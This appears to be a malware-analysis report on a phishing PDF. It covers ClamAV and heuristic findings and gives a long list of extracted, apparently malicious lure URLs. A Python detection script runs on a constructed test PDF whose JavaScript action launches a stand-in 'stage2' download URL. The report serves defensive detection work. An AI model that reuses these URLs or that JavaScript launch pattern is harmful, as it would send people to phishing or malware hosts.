Risk Score: 104 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.001 PowerShell
- T1566.002 Spearphishing Link
The file is a PDF with an embedded JavaScript stream, a common delivery technique for malicious content. It also carries an external URI action pointing to a suspicious URL, which likely serves as the download source for a secondary payload. A ClamAV signature match and the ML classifier score further support the malicious verdict.
Machine Learning
- Nyx PDF Classifier malicious score 0.8192
Heuristics (5)
- ClamAV: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
- Embedded JS stream [low] PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- External URI [info] PDF_URI: PDF contains an external URL action.
- Object number defined twice with different bodies [info] PDF_DUPLICATE_OBJ_BODY_INCREMENTAL: The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted URLs:
- https://lovig.co.za/XSRYdR1H?utm_term=mikrotik+rb2011uias-rm+manual+2+download+2017+2
- https://validujagobun.weebly.com/uploads/1/3/4/5/134526773/6e9d3243f2e38.pdf
- https://kekulepolunan.weebly.com/uploads/1/3/4/8/134889268/rijamezirale-pamufowar-pekefutab.pdf
- https://hattoco.vn/images/ckeditor/files/28716778485.pdf
- https://sisekiki.weebly.com/uploads/1/3/4/6/134622657/tepabuxukobinapit.pdf
- https://pezibusogesa.weebly.com/uploads/1/3/0/7/130739584/7677173.pdf
- https://snabavto.com/wp-content/plugins/formcraft/file-upload/server/content/files/1620f2651109e5---45229560879.pdf
- https://dobukikiwaf.weebly.com/uploads/1/3/5/2/135295041/9137a.pdf
- http://www.ecostroyservis.ru/File/76790318036.pdf
- https://jugosubu.weebly.com/uploads/1/4/1/4/141417626/pojun_vopini_jivodofubitew.pdf
- https://puxipevabama.weebly.com/uploads/1/3/4/3/134308905/4765025.pdf
- http://koronavirus.lenti.hu/feltoltes/files/45072901060.pdf
- https://vovamujif.weebly.com/uploads/1/3/5/3/135318660/3173750.pdf
- https://bifomika.weebly.com/uploads/1/3/1/8/131856700/4094560.pdf
- https://paxolobiwoke.weebly.com/uploads/1/3/1/1/131163878/koxivinavijori.pdf
- https://rugexosijebup.weebly.com/uploads/1/3/4/0/134017508/3711741.pdf
- https://tasidajerodal.weebly.com/uploads/1/3/4/7/134757451/nipise.pdf
- https://kuwoloxafi.weebly.com/uploads/1/3/0/8/130873903/sezepul_giwidi_zuzirorepola.pdf
- https://roxejozojone.weebly.com/uploads/1/3/0/9/130969259/927ea067628.pdf
- https://vishalahospitality.com/ckfinder/userfiles/files/juwurupuxosimam.pdf
- https://saxurugilura.weebly.com/uploads/1/3/2/8/132814125/sekigokoluwoxafes.pdf
- https://vexuzunudupugez.weebly.com/uploads/1/3/0/7/130740013/sinaxuwofij.pdf
- https://www.vek-bg.com/app/templates/js/ckfinder/userfiles/files/forax.pdf
- https://jizoneva.weebly.com/uploads/1/3/0/7/130738725/gawatolovotuzoxovugi.pdf
- http://www.iso-clean.fr/wp-content/plugins/formcraft/file-upload/server/content/files/1628ae969e58a8---16119915992.pdf
- https://vesizolakaz.weebly.com/uploads/1/3/4/3/134333528/futarepatelij.pdf
- https://diwizimop.weebly.com/uploads/1/3/4/3/134314139/8742770.pdf
- https://nonekuvifuno.weebly.com/uploads/1/3/4/4/134478383/wavozazegax-fajukazewalakuf-sanidivuwaveli-nexeto.pdf
- https://zupelewelasilag.weebly.com/uploads/1/3/4/5/134594614/wiboxusuro-gefupedamivax-voxizefa.pdf
- http://jojo.net/data/jojo.net/uploadfiles/file/sururetepatopi.pdf
- https://voicelux.ru/wp-content/plugins/super-forms/uploads/php/files/8378c45b27aac728b5d4580348d227c5/panexogup.pdf
- http://gemeinschaftshaus-grossmuss.de/demo/admin/editor/kcfinder/upload/files/54812843510.pdf
- https://ruzejeparofilag.weebly.com/uploads/1/3/4/5/134582671/48ca54de10d5.pdf
- https://tibalazilidogu.weebly.com/uploads/1/4/1/2/141257669/6889b8408551.pdf
- https://farukipem.weebly.com/uploads/1/3/4/4/134473356/c0ee6082e.pdf
- https://nuxafinumi.weebly.com/uploads/1/4/1/4/141466153/9320682.pdf
- https://fusidefedarej.weebly.com/uploads/1/3/4/8/134857834/02690a42eef4da.pdf
- http://wignaccent.com/FCKeditor_2.6.3/userimages/file/20220423201340.pdf
- https://xozavefo.weebly.com/uploads/1/3/4/0/134018900/8548241.pdf
- https://stradatextiles.com/upload/ckfinder/files/92282746816.pdf
- https://gojemafofapuvog.weebly.com/uploads/1/3/2/6/132681271/togijugonurimo.pdf
- http://mpapir.ekopapir.com/images/files/difixulufeditan.pdf
- https://tusujowifavenag.weebly.com/uploads/1/3/1/4/131453847/2022415.pdf
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/pdf/1.3/
- http://ns.adobe.com/xap/1.0/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/rights/
- http://dejavu.sourceforge.net
+1 more URL(s)
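The PDF_JS, PDF_URI, PDF_DUPLICATE_OBJ_BODY_INCREMENTAL and EMBEDDED_URL heuristics above can be reproduced with a small byte-level scan. The following is an added example, not the analyzer's own code: it builds a constructed PDF (the SAMPLE_PDF bytes and the example.invalid URLs are placeholders, not the analysed sample) in which object 5 is defined twice, once as a harmless text annotation and once, in an incremental update, as a JavaScript action. It shows how first-wins and last-wins resolution of that object disagree, labels each extracted URL with the channel that carried it, and escalates the duplicate-object finding only when a conflicting body carries active content. The ACTIVE_KEYS list, the severity labels (info/low/high) and all function names are this example's own choices.

```python
import hashlib
import re

# Constructed sample (not the analysed file): object 5 is defined twice. A
# first-wins reader sees a harmless text annotation; a last-wins reader sees
# a JavaScript action that the catalog's /OpenAction already points at.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /OpenAction 5 0 R >>
endobj
4 0 obj
<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.invalid/payload.pdf) >> >>
endobj
5 0 obj
<< /Type /Annot /Subtype /Text /Contents (benign note) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
5 0 obj
<< /S /JavaScript /JS (app.launchURL("https://example.invalid/stage2", true);) >>
endobj
trailer
<< /Root 1 0 R /Prev 0 >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")
# Dictionary keys that make an object execute or fetch something on open
# (this list is the example's own choice, not the analyzer's rule set).
ACTIVE_KEYS = (b"/JS", b"/JavaScript", b"/Launch", b"/OpenAction", b"/AA",
               b"/URI", b"/GoToR", b"/SubmitForm")


def iter_objects(pdf):
    """Yield (num, gen, body) for every 'N G obj ... endobj' in file order."""
    for m in OBJ_RE.finditer(pdf):
        yield int(m.group(1)), int(m.group(2)), m.group(3)


def resolve(pdf, policy):
    """Object table as a first-wins ('first') or last-wins ('last') reader builds it."""
    table = {}
    for num, gen, body in iter_objects(pdf):
        if policy == "first" and (num, gen) in table:
            continue
        table[(num, gen)] = body
    return table


def duplicate_objects(pdf):
    """(num, gen) -> bodies, only for objects defined more than once with
    different bytes; byte-identical re-definitions are not reported."""
    bodies = {}
    for num, gen, body in iter_objects(pdf):
        bodies.setdefault((num, gen), []).append(body)
    return {k: v for k, v in bodies.items()
            if len({hashlib.sha256(b).digest() for b in v}) > 1}


def has_active_content(body):
    return any(key in body for key in ACTIVE_KEYS)


def extract_urls(pdf):
    """(url, channel) pairs; the URL itself is not a detection."""
    found = []
    for _, _, body in iter_objects(pdf):
        if b"/JS" in body or b"/JavaScript" in body:
            channel = "JS"
        elif b"/URI" in body:
            channel = "link annotation"
        else:
            channel = "document body"
        for url in URL_RE.findall(body):
            found.append((url.decode("latin-1"), channel))
    return found


def score(pdf):
    """Return (rule, severity) findings in rule order."""
    findings = []
    objs = [body for _, _, body in iter_objects(pdf)]
    if any(b"/JS" in b or b"/JavaScript" in b for b in objs):
        findings.append(("PDF_JS", "low"))
    if any(re.search(rb"/S\s*/URI", b) for b in objs):
        findings.append(("PDF_URI", "info"))
    dups = duplicate_objects(pdf)
    if dups:
        # Body-only differences are routine in incremental updates, so the
        # finding stays informational unless a conflicting body is active.
        active = any(has_active_content(b) for v in dups.values() for b in v)
        findings.append(("PDF_DUPLICATE_OBJ_BODY_INCREMENTAL",
                         "high" if active else "info"))
    return findings
```

Running `score(SAMPLE_PDF)` yields PDF_JS (low), PDF_URI (info) and the duplicate-object rule at high, because the second body of object 5 contains /JS; `resolve(SAMPLE_PDF, "first")` returns the benign note for object 5 while `resolve(SAMPLE_PDF, "last")` returns the JavaScript action. Replacing that second body with another plain annotation drops the duplicate finding back to info, which is the escalation logic the heuristic text describes.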
Extracted artifacts (3)
Files carved from inside the sample during analysis.
| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| font_00_sfnt_off00020f2e.bin | 9d2294e344127da9ddc2b77d68b1576b6b78373885bc9da2859f180a98f2c1e1 | pdf-font-stream | PDF embedded font (sfnt) at offset 0x20F2E | 16792 bytes |
| font_01_sfnt_off00022745.bin | 8e79b0921f9443137af0182b3b1c458e5ec166313d7b97f84d108d0ce598f514 | pdf-font-stream | PDF embedded font (sfnt) at offset 0x22745 | 11068 bytes |
| font_02_sfnt_off0002413e.bin | 46fad183022e1bed88923009bf9c2ffe5a259398478a5a4004428338cafeb588 | pdf-font-stream | PDF embedded font (sfnt) at offset 0x2413E | 19184 bytes |